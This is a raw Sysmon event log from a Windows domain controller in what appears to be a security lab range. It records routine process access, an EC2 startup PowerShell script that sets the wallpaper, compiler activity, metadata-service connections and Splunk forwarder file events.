10341000x80000000000000007879Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:46.543{266CAFBE-64C1-6064-9100-00000000AE01}51086184C:\Windows\system32\csrss.exe{266CAFBE-64E6-6064-BE00-00000000AE01}2904C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5182f 10341000x80000000000000007878Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:46.543{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000007877Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:46.543{266CAFBE-64E6-6064-BD00-00000000AE01}64966504C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe{266CAFBE-64E6-6064-BE00-00000000AE01}2904C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7354|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorpehost.dll+b46d|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorpehost.dll+3db4|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorpehost.dll+3f2c|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorpehost.dll+4002|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorpehost.dll+27b2|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorpehost.dll+2804|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorpehost.dll+2948|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe+7fe06|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe+4726f|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe+45e1f|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe+45b16|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe+45826|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe+1938a|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe+18bf6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe+a831|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe+1f0a49|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 154100x80000000000000007876Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:46.546{266CAFBE-64E6-6064-BE00-00000000AE01}2904C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe14.10.25028.0 built by: VCTOOLSD15RTMMicrosoft® Resource File To COFF Object Conversion UtilityMicrosoft® .NET FrameworkMicrosoft CorporationCVTRES.EXEC:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\ADMINI~1\AppData\Local\Temp\RES16D.tmp" "c:\Users\Administrator\AppData\Local\Temp\apa15htr\CSCD82B1FD6BFA44FE3AD706A9C26EF4E.TMP"C:\Windows\system32\ATTACKRANGE\Administrator{266CAFBE-64C3-6064-2804-0B0000000000}0xb04282HighMD5=C877CBB966EA5939AA2A17B6A5160950,SHA256=1FE531EAC592B480AA4BD16052B909C3431434F17E7AE163D248355558CE43A6,IMPHASH=55D76ADE7FFEA0F41FF2B55505C2B362{266CAFBE-64E6-6064-BD00-00000000AE01}6496C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Administrator\AppData\Local\Temp\apa15htr\apa15htr.cmdline" 10341000x80000000000000007875Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:46.247{266CAFBE-64E2-6064-BB00-00000000AE01}68206840C:\Windows\system32\conhost.exe{266CAFBE-64E6-6064-BD00-00000000AE01}6496C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000007874Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:46.247{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000007873Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:46.247{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000007872Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:46.247{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000007871Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:46.247{266CAFBE-64C1-6064-9100-00000000AE01}51084328C:\Windows\system32\csrss.exe{266CAFBE-64E6-6064-BD00-00000000AE01}6496C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5182f 10341000x80000000000000007870Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:46.247{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000007869Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:46.247{266CAFBE-64E2-6064-BC00-00000000AE01}68606984C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe{266CAFBE-64E6-6064-BD00-00000000AE01}6496C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7354|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\c99ae323aa8566cc2c0b79b709b48095\System.ni.dll+384236|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\c99ae323aa8566cc2c0b79b709b48095\System.ni.dll+2be405|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\c99ae323aa8566cc2c0b79b709b48095\System.ni.dll+2be05f|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\c99ae323aa8566cc2c0b79b709b48095\System.ni.dll+2bdb80|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\c99ae323aa8566cc2c0b79b709b48095\System.ni.dll+2bdb08|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\c99ae323aa8566cc2c0b79b709b48095\System.ni.dll+2bc1c3|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\c99ae323aa8566cc2c0b79b709b48095\System.ni.dll+7d9461|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\c99ae323aa8566cc2c0b79b709b48095\System.ni.dll+7d886a|C:\Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.P521220ea#\248750a67803cf70fc202269b0f06183\Microsoft.PowerShell.Commands.Utility.ni.dll+ee5a8940|C:\Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.P521220ea#\248750a67803cf70fc202269b0f06183\Microsoft.PowerShell.Commands.Utility.ni.dll+ee5a8940|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\d5c471afac895a838c8233aa52080857\System.Management.Automation.ni.dll+5ab09530(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\d5c471afac895a838c8233aa52080857\System.Management.Automation.ni.dll+5aae34f2(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\d5c471afac895a838c8233aa52080857\System.Management.Automation.ni.dll+5aae312d(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\d5c471afac895a838c8233aa52080857\System.Management.Automation.ni.dll+5b5ab42b(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\d5c471afac895a838c8233aa52080857\System.Management.Automation.ni.dll+5aaa009f(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\d5c471afac895a838c8233aa52080857\System.Management.Automation.ni.dll+5ab03b11(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\d5c471afac895a838c8233aa52080857\System.Management.Automation.ni.dll+5aae5b20(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\d5c471afac895a838c8233aa52080857\System.Management.Automation.ni.dll+5aae5b20(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\d5c471afac895a838c8233aa52080857\System.Management.Automation.ni.dll+5aae5ca0(wow64)|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\clr.dll+16ee92 154100x80000000000000007868Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:46.208{266CAFBE-64E6-6064-BD00-00000000AE01}6496C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe4.8.3761.0 built by: NET48REL1Visual C# Command Line CompilerMicrosoft® .NET FrameworkMicrosoft Corporationcsc.exe"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Administrator\AppData\Local\Temp\apa15htr\apa15htr.cmdline"C:\Windows\system32\ATTACKRANGE\Administrator{266CAFBE-64C3-6064-2804-0B0000000000}0xb04282HighMD5=23EE3D381CFE3B9F6229483E2CE2F9E1,SHA256=4240A12E0B246C9D69AF1F697488FE7DA1B497DF20F4A6F95135B4D5FE180A57,IMPHASH=EE1E569AD02AA1F7AECA80AC0601D80D{266CAFBE-64E2-6064-BC00-00000000AE01}6860C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe -NoProfile -NonInteractive -NoLogo -WindowStyle hidden -ExecutionPolicy Unrestricted "Import-Module "C:\ProgramData\Amazon\EC2-Windows\Launch\Module\Ec2Launch.psd1"; Set-Wallpaper -Initial" 11241100x80000000000000007867Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:46.200{266CAFBE-64E2-6064-BC00-00000000AE01}6860C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Users\Administrator\AppData\Local\Temp\apa15htr\apa15htr.cmdline2021-03-31 12:02:46.200 11241100x80000000000000007866Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.localDLL2021-03-31 12:02:46.200{266CAFBE-64E2-6064-BC00-00000000AE01}6860C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Users\Administrator\AppData\Local\Temp\apa15htr\apa15htr.dll2021-03-31 12:02:46.200 10341000x80000000000000007896Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:47.649{266CAFBE-64C4-6064-9C00-00000000AE01}46204256C:\Windows\system32\sihost.exe{266CAFBE-64D3-6064-B600-00000000AE01}5544C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\SYSTEM32\usermgrcli.dll+1121|C:\Windows\System32\modernexecserver.dll+386f0|C:\Windows\System32\modernexecserver.dll+2ff00|C:\Windows\System32\modernexecserver.dll+1e81d|C:\Windows\System32\modernexecserver.dll+1e514|C:\Windows\System32\modernexecserver.dll+49142|C:\Windows\System32\modernexecserver.dll+14a47|C:\Windows\SYSTEM32\ntdll.dll+3a9e0|C:\Windows\SYSTEM32\ntdll.dll+1e86f|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 23542300x80000000000000007895Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:47.260{266CAFBE-648B-6064-7A00-00000000AE01}4692NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-PowerShell_OperationalMD5=AFA99F9A8D290B32D2A76A7847042689,SHA256=410CC77407C8E82E00DDB94CE6E2151503BFBBCBDCB1EC3FC128428128648648,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000007894Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:47.120{266CAFBE-648B-6064-7A00-00000000AE01}4692NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-PowerShell_OperationalMD5=E07315041470B742952C75E6EEFF2511,SHA256=755AA96A9244F4AA3FE3F16F5ECD175EE1BFEFEB8E417BB6E185211B2C434010,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000007893Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:47.120{266CAFBE-648B-6064-7A00-00000000AE01}4692NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=5B5EE7440BF2EE1E00BC65C08BA6FB78,SHA256=D96F7A9D244523D713BF4C663BB6C759748E899E6AECC4B42FBE9571482B2F72,IMPHASH=00000000000000000000000000000000falsetrue 11241100x80000000000000007904Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:48.990{266CAFBE-647D-6064-2F00-00000000AE01}2796C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exeC:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\README.txt2021-03-31 12:02:48.990 11241100x80000000000000007903Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:48.990{266CAFBE-647D-6064-2F00-00000000AE01}2796C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exeC:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\LICENSE.txt2021-03-31 12:02:48.990 354300x80000000000000007902Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:46.959{266CAFBE-64E2-6064-BC00-00000000AE01}6860C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeATTACKRANGE\Administratortcptruefalse10.0.1.14win-dc-892.attackrange.local53591-false169.254.169.254-80http 354300x80000000000000007901Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:46.938{266CAFBE-64E2-6064-BC00-00000000AE01}6860C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeATTACKRANGE\Administratortcptruefalse10.0.1.14win-dc-892.attackrange.local53590-false169.254.169.254-80http 23542300x80000000000000007900Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:48.397{266CAFBE-648B-6064-7A00-00000000AE01}4692NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-PowerShell_OperationalMD5=0C59A738E2E9B75E6CCE237519465501,SHA256=6E8EF86BAFA9D0B66651B008C1A2CDC4618B049F9FF6DFF78426494B28BA5A28,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000007899Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:48.397{266CAFBE-648B-6064-7A00-00000000AE01}4692NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=F205DC45370F2F84F004412CD86348EA,SHA256=4FA0206CDCE6E1C15D93D81FF2526D930AC6D826A636D755C232386DF520B347,IMPHASH=00000000000000000000000000000000falsetrue 10341000x80000000000000007898Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:48.117{266CAFBE-646C-6064-1200-00000000AE01}11961192C:\Windows\system32\svchost.exe{266CAFBE-64E2-6064-BC00-00000000AE01}6860C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6c14|c:\windows\system32\fntcache.dll+17acf|c:\windows\system32\fntcache.dll+1a697|c:\windows\system32\fntcache.dll+1aacc|c:\windows\system32\fntcache.dll+5034e|c:\windows\system32\fntcache.dll+50052|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000007897Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:48.117{266CAFBE-646C-6064-1200-00000000AE01}11961192C:\Windows\system32\svchost.exe{266CAFBE-64E2-6064-BC00-00000000AE01}6860C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6c14|c:\windows\system32\fntcache.dll+17acf|c:\windows\system32\fntcache.dll+1a697|c:\windows\system32\fntcache.dll+1aacc|c:\windows\system32\fntcache.dll+5034e|c:\windows\system32\fntcache.dll+50052|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 23542300x80000000000000007973Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:49.893{266CAFBE-648B-6064-7A00-00000000AE01}4692NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=0707D0D06182E4042FE2A22353B3FFB1,SHA256=160709C994908846E73423B42A4F949B56C3D1E8E236A31D307993359E48FB62,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000007972Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:49.878{266CAFBE-64E2-6064-BA00-00000000AE01}6812ATTACKRANGE\AdministratorC:\Windows\system32\cmd.exeC:\Users\Administrator\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\RunWallpaperSetupInit.cmdMD5=6F31D86A88379966303FF5E580AC09C9,SHA256=D6EC54010FC20FADFE76B05AE3DDBCAB1C3134F462C4ED615C32B571A2930D38,IMPHASH=00000000000000000000000000000000falsetrue 10341000x80000000000000007971Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:49.847{266CAFBE-64E2-6064-BB00-00000000AE01}68206840C:\Windows\system32\conhost.exe{266CAFBE-64E9-6064-C500-00000000AE01}6944C:\Windows\system32\findstr.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000007970Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:49.847{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000007969Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:49.847{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000007968Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:49.847{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000007967Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 